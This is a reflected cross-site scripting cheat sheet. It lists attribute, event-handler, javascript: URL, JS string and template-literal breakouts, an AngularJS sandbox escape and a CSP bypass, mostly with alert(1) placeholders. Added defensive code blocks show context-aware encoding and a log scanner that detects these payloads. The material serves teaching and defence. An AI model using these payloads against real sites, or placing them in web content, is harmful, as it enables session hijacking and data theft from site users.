Reflected
Context
AccessKey Attribute
Set a global accesskey attribute. When the user presses the selected key, the injected handler runs. Works only on Chrome.
<url>/?%27accesskey=%27<key>%27onclick=%27alert(1)
HTML Parameter
"><script>...</script>
"><svg onload="...">
"><img src=. onerror="...">
// if angle brackets are escaped, inject an onfocus handler and autofocus the element
" autofocus onfocus="..." x="
" onmouseover="..." x="
Anchor href parameter poisoning
href="javascript:'...'"
HTML Tags
Find the vulnerable field
Send the request to Burp Intruder with the following payload position to find unfiltered tags
<§[payload]§>
Set the payload to a list of tags (see here) and start the attack
After finding an unfiltered tag, set the payload position to
<[tag]+§[payload]§="alert()">
Set the payload to a list of events (see here) and start the attack
After finding a suitable event, the basic payload is
<[tag]+[event]="[js]">
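The HTML Parameter, href and HTML Tags sections above all work for the same reason: the reflected value reaches the page without encoding that matches the context it lands in. The following is an added example, not code from the cheat sheet; it shows context-aware output encoding for those three sinks. The function names (encodeForHtml, renderAttribute, safeUrl, renderSearchResult) are assumptions chosen for the illustration.

```javascript
// Added example, not from the cheat sheet: context-aware output encoding for
// the HTML sinks in the sections above. Function names are assumptions.

// Characters that can end a text node, close a quoted attribute, or start a
// new tag, attribute or entity. Encoding them as entities makes the browser
// treat them as data rather than markup.
const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;',
  "'": '&#x27;', '/': '&#x2F;', '`': '&#x60;', '=': '&#x3D;',
};

function encodeForHtml(input) {
  return String(input).replace(/[&<>"'\/`=]/g, (ch) => HTML_ESCAPES[ch]);
}

// An unquoted attribute value ends at the first space, so a payload such as
// accesskey=x onclick=... becomes new attributes no matter how the quotes are
// encoded. Always emit the attribute quoted, then encode the value.
function renderAttribute(name, value) {
  return name + '="' + encodeForHtml(value) + '"';
}

// href/src sinks need scheme validation, not encoding: the browser decodes
// entities before resolving the URL, so an encoded "javascript:" still runs.
// Browsers also ignore ASCII control characters inside the scheme, so they are
// stripped before the check (otherwise "java\tscript:" slips past).
function safeUrl(url) {
  const raw = String(url).trim();
  const scheme = raw.replace(/[\u0000-\u0020]/g, '').toLowerCase();
  if (/^https?:\/\//.test(scheme)) return raw;   // absolute http(s) URL
  if (/^\/(?!\/)/.test(scheme)) return raw;      // same-origin path, not //host
  return 'about:blank';                          // anything else is dropped
}

// Assumed sink: a search result link that reflects the query in three places
// (href, an attribute value and the text node), each encoded for its context.
function renderSearchResult(query, link) {
  return '<a ' + renderAttribute('href', safeUrl(link)) + ' ' +
         renderAttribute('title', query) + '>' + encodeForHtml(query) + '</a>';
}

// Constructed inputs: the attribute-breakout and javascript: payloads above.
console.log(renderSearchResult('" autofocus onfocus="alert(1)" x="', 'javascript:alert(1)'));
```

The attribute payload survives only as entity text inside a quoted value, and the javascript: link is replaced rather than encoded, because encoding a URL never changes its scheme.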
Deliver through IFrame
<iframe src="<url>" onload="...">
Deliver with custom tag with autofocus
<script>
location = "<url>/?search=<xss id='x' onfocus='...' tabindex=1>#x";
</script>
Javascript Block
Escape from a string such as var x = 'input'
</script><script>...</script>
Escape from strings with angle brackets encoded
'-<payload>-'
';<payload>//
Evade filters
\';<...>// // double quote filter
onerror=<func>;throw <arg> // assign to the error event
'-<...>-' // HTML-escaped quotes
JS Template Literals
JS template literals are declared between backticks and use the ${...} notation to evaluate an expression and inject the result into the string.
`Welcome, ${user.displayName}.`;
To execute code, inject ${<...>} into the string
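The Javascript Block and JS Template Literals sections above both come down to untrusted text being spliced into script source. As an added example, not code from the cheat sheet, the block below contrasts the quote-only filter those payloads defeat with a serializer that survives them, and shows when ${...} in a template literal is and is not evaluated. The function names (naiveQuoteEscape, encodeForJsValue, renderInlineScript, greet) are assumptions.

```javascript
// Added example, not from the cheat sheet: why quote-escaping alone does not
// protect a JavaScript string sink, and one safe way to embed untrusted data
// in an inline script. Function names are assumptions.

// The kind of filter the \'; and </script> payloads above get past: it escapes
// quotes but not backslashes, and it knows nothing about the HTML parser.
function naiveQuoteEscape(input) {
  return String(input).replace(/'/g, "\\'");
}

// JSON.stringify escapes quotes and backslashes correctly; the extra pass turns
// the characters that matter to the HTML parser (<, >, &) and the JS line
// terminators U+2028/U+2029 into \uXXXX escapes, so "</script>" can never
// appear in the output and the parser cannot close the script block early.
function encodeForJsValue(value) {
  return JSON.stringify(value).replace(/[<>&\u2028\u2029]/g,
    (ch) => '\\u' + ch.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Assumed server-side sink: the page's var x = 'input' case, rendered safely.
function renderInlineScript(userInput) {
  return '<script>var x = ' + encodeForJsValue(userInput) + ';</script>';
}

// Template literals: ${...} is only evaluated where it appears in the script
// source. Interpolating a runtime value is safe; the ${<...>} trick above
// works only when user input is spliced into the source text itself.
function greet(displayName) {
  return `Welcome, ${displayName}.`;
}

// Constructed inputs from the sections above, run through both approaches.
const probes = ["</script><script>alert(1)</script>", "';alert(1)//", "\\';alert(1)//"];
for (const p of probes) {
  console.log('naive :', "var x = '" + naiveQuoteEscape(p) + "'");
  console.log('safe  :', renderInlineScript(p));
}
console.log(greet('${alert(1)}'));  // printed literally, not evaluated
```

With the naive filter the backslash payload produces an escaped backslash followed by a live closing quote, and the </script> payload is untouched because the filter never considers the HTML parser; the JSON-based encoder keeps both as inert string data and round-trips losslessly.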
AngularJS Sandbox Escape
Sandbox escape by overwriting the charAt method to join characters instead of evaluating them one at a time
toString().constructor.prototype.charAt%3d[].join;
Code execution payloads
$eval('x=<...>')
[1]|orderBy:toString().constructor.fromCharCode(120 61 <charcode payload>)=1 // 120 61 is for 'x='
Content Security Policy Bypass
<input autofocus ng-focus="$event.path|orderBy:'[].constructor.from([1],<...>)'">
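Every payload family on this page (attribute breakouts, event handlers, accesskey, javascript: URLs, JS string breakouts, template literals and AngularJS expressions) has a recognisable shape once the query string is fully URL-decoded. The following is an added example, not from the cheat sheet: a triage heuristic that scans access-log lines for those shapes. The signature names, the log lines and the IP addresses are all constructed for the example, and the functions (fullyDecode, scanLogLine, scanLog) are assumptions.

```javascript
// Added example, not from the cheat sheet: a triage heuristic that flags the
// reflected-XSS payload families on this page in web-server access logs.
// Signature names, the log lines and the IP addresses are all constructed
// for the example; it is a detection aid, not a WAF.

// Browsers ignore ASCII control characters inside a URL scheme, so match
// "javascript:" with any mix of them between the letters (e.g. "java\tscript:").
const JS_SCHEME = new RegExp(
  'javascript'.split('').join('[\\s\\x00-\\x1f]*') + '[\\s\\x00-\\x1f]*:', 'i');

// Each signature is applied to the fully URL-decoded query string.
const SIGNATURES = [
  ['html-tag-injection',  /<\s*\/?\s*[a-z]/i],          // "><svg ...>, </script>
  ['event-handler',       /\bon[a-z]+\s*=/i],           // onerror=, onfocus=, onclick=
  ['accesskey-attribute', /\baccesskey\s*=/i],          // accesskey='...'
  ['javascript-url',      JS_SCHEME],                   // href="javascript:..."
  ['js-string-breakout',  /['"]\s*[-;]/],               // '-payload-', ';payload//
  ['template-literal',    /\$\{/],                      // ${...}
  ['angular-expression',  /\b(?:\$eval|orderBy|constructor)\b|\bng-[a-z]+\s*=/i],
];

// Decode repeatedly so double-encoded payloads (%2527 -> %27 -> ') are seen
// the way the application would see them. Malformed %xx sequences stop decoding.
function fullyDecode(query) {
  let current = query.replace(/\+/g, ' ');
  for (let round = 0; round < 3; round++) {
    let next;
    try { next = decodeURIComponent(current); } catch (e) { break; }
    if (next === current) break;
    current = next;
  }
  return current;
}

// Common/combined log format: pull the request target out of the request line.
const REQUEST_LINE = /"(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+"/;

function scanLogLine(line) {
  const m = REQUEST_LINE.exec(line);
  if (!m) return null;                                  // not a request line
  const url = m[1];
  const q = url.indexOf('?');
  if (q < 0) return { url, findings: [] };
  const query = fullyDecode(url.slice(q + 1));
  const findings = SIGNATURES.filter(([, re]) => re.test(query)).map(([name]) => name);
  return { url, findings };
}

function scanLog(lines) {
  return lines.map(scanLogLine).filter((r) => r && r.findings.length > 0);
}

// Constructed log lines: one benign search followed by payloads from this page.
const SAMPLE_LOG = [
  '10.0.0.5 - - [01/Jan/2024:12:00:00 +0000] "GET /?search=blue+shoes HTTP/1.1" 200 1024',
  '10.0.0.6 - - [01/Jan/2024:12:00:01 +0000] "GET /?search=%22%3E%3Cimg%20src%3D.%20onerror%3D%22alert(1)%22%3E HTTP/1.1" 200 1024',
  '10.0.0.7 - - [01/Jan/2024:12:00:02 +0000] "GET /?%2527accesskey%253D%2527x%2527onclick%253D%2527alert(1) HTTP/1.1" 200 1024',
  '10.0.0.8 - - [01/Jan/2024:12:00:03 +0000] "GET /go?next=java%09script:alert(1) HTTP/1.1" 302 0',
  '10.0.0.9 - - [01/Jan/2024:12:00:04 +0000] "GET /?q=' +
    encodeURIComponent('<input autofocus ng-focus="$event.path|orderBy:\'[].constructor.from([1],alert(1))\'">') +
    ' HTTP/1.1" 200 2048',
  '10.0.0.10 - - [01/Jan/2024:12:00:05 +0000] "GET /?search=%27-alert(1)-%27 HTTP/1.1" 200 1024',
];

for (const hit of scanLog(SAMPLE_LOG)) {
  console.log(hit.url, '->', hit.findings.join(', '));
}
```

The decoding loop matters more than the signatures: the accesskey line is double-encoded and the javascript: line hides a tab inside the scheme, and both are exactly the variants a single-pass, exact-string match misses. Expect false positives on legitimate input containing apostrophes followed by a dash or semicolon; treat hits as a queue for review, not as blocking decisions.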